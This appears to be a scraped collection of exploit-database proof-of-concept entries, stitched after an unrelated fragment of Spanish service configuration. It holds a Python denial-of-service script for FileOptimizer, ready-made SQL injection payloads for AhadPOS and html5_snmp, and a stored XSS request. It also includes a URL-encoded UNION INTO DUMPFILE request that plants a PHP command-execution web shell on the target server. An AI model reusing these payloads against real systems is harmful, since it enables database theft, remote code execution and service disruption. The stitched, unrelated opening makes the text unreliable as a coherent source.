        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Network Inventory Advisor Service by ClearApps Software
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
HireHackking 
# Exploit Title:  FileOptimizer 14.00.2524 - Denial of Service (PoC)
# Date: 2019-11-04
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: https://sourceforge.net/projects/nikkhokkho/
# Software Link: https://sourceforge.net/projects/nikkhokkho/files/FileOptimizer/14.00.2524/FileOptimizerSetup.exe/download
# Version: 14.00.2524
# Tested on: Windows 7 Ultimate x86 SP0
# CVE : none

## Steps to reproduce
## Open application for the first time so it generates "FileOptimizer32.ini" in the install directory
## Run the PoC
## Open FileOptimizer again, navigating to "Optimize" / "Options".
## Click OK to crash

#! /usr/bin/env python
import os, sys, re

test="TempDirectory="  # variable/str in config file to replace with buffer
dir = "C:\\Program Files\\FileOptimizer\\"
file = "FileOptimizer32.ini"

sploit = "A"*5000

temp = open(dir+file,'r').read()
temp2 = re.sub(test, test + sploit, temp) 
with open(dir+file,'w') as F:
    F.write(temp2)
    F.close()
HireHackking 
# Exploit Title: rimbalinux AhadPOS 1.11 - 'alamatCustomer' SQL Injection
# Date: 2019-11-01
# Exploit Author: Cakes
# Vendor Homepage: https://github.com/rimbalinux/AhadPOS
# Software Link: https://github.com/rimbalinux/AhadPOS.git
# Version: 1.11
# Tested on: CentOS 7
# CVE: N/A

# PoC for time-based and boolean based blind SQL injection

# Parameter: alamatCustomer (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])    
    
Payload: namaCustomer=test&alamatCustomer=test'||(SELECT 0x4b686f74 FROM DUAL WHERE 8368=8368 AND (SELECT 9520 FROM (SELECT(SLEEP(5)))gtad))||'&telpCustomer=12312345&keterangan=tester

# Parameter: barcode (POST)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause
# Vector: OR [INFERENCE]    
    
Payload: barcode=-3529' OR 4127=4127-- HRDC&jumBarang=1&btnTambah=(t) Tambah
    
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])    
    
Payload: barcode=123' AND (SELECT 1256 FROM (SELECT(SLEEP(5)))Nhnk)-- zXsC&jumBarang=1&btnTambah=(t) Tambah
HireHackking 
# Exploit Title: html5_snmp 1.11 - 'Router_ID' SQL Injection
# Date: 2019-11-01
# Exploit Author: Cakes
# Vendor Homepage: https://github.com/lolypop55/html5_snmp
# Software Link: https://github.com/lolypop55/html5_snmp.git
# Version: 1.11
# Tested on: CentOS 7
# CVE: N/A

# PoC for error, time, boolean and Union based SQL Injection

# Parameter: Router_ID (POST)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    
    
Payload: Router_ID=123' AND (SELECT 9724 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9724=9724,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aJYp'='aJYp&Router_Name=123&Router_IP=123&String=123&Remark=123&Submit=Save

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])   
    
Payload: Router_ID=123' AND (SELECT 7074 FROM (SELECT(SLEEP(5)))hDkA) AND 'koRt'='koRt&Router_Name=123&Router_IP=123&String=123&Remark=123&Submit=Save

# Parameter: Router_IP (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Vector: AND [INFERENCE]   
    
Payload: Router_IP=192.168.0.1' AND 3390=3390-- yUHk
    
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])    
    
Payload: Router_IP=192.168.0.1' AND (SELECT 2831 FROM (SELECT(SLEEP(5)))SwFp)-- VukE
    
# Type: UNION query
# Title: Generic UNION query (NULL) - 5 columns
# Vector:  UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL[GENERIC_SQL_COMMENT]    
    
Payload: Router_IP=192.168.0.1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787071,0x4f4f4e6c58704e78566b76576358564c4e5145575543435658706d4e50476d6a6c65505366497571,0x7170717671),NULL-- BEdT

# Pop a Shell :-)

GET /get_router_show.php?Router_IP=%27%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%30%78%33%33%63%33%66%37%30%36%38%37%30%32%30%32%34%36%33%36%64%36%34%32%30%33%64%32%30%37%33%36%38%36%35%36%63%36%63%35%66%36%35%37%38%36%35%36%33%32%38%32%34%35%66%34%37%34%35%35%34%35%62%32%37%36%33%36%64%36%34%32%37%35%64%32%39%33%62%32%30%36%35%36%33%36%38%36%66%32%30%32%34%36%33%36%64%36%34%33%62%32%30%33%66%33%65%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%20%49%4e%54%4f%20%44%55%4d%50%46%49%4c%45%20%27%2f%76%61%72%2f%77%77%77%2f%73%6e%6d%70%30%31%2f%75%70%6c%6f%61%64%73%2f%65%78%65%63%2e%70%68%70%27%2d%2d%20%44%52%74%66 HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://Target/get_router.php
Cookie: PHPSESSID=ii1kfjgplci8vbfep3ius67353
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Cache-Control: max-age=0
HireHackking 
# Exploit Title: html5_snmp 1.11 - 'Remark' Persistent Cross-Site Scripting
# Date: 2019-11-01
# Exploit Author: Cakes
# Vendor Homepage: https://github.com/lolypop55/html5_snmp
# Software Link: https://github.com/lolypop55/html5_snmp.git
# Version: 1.11
# Tested on: CentOS 7
# CVE: N/A

# PoC

POST /add_router_operation.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/add_router.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 128
Cookie: submenu1=block; showips=10; showurls=10; showreferers=10; PHPSESSID=9m6bv15esubafglv5cnbcha421
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1


Router_ID=ID&Router_Name=Name&Router_IP=IP&String=STRING&Remark=%3Cscript%3Ealert%28%22test5%22%29%3B%3C%2Fscript%3E&Submit=Save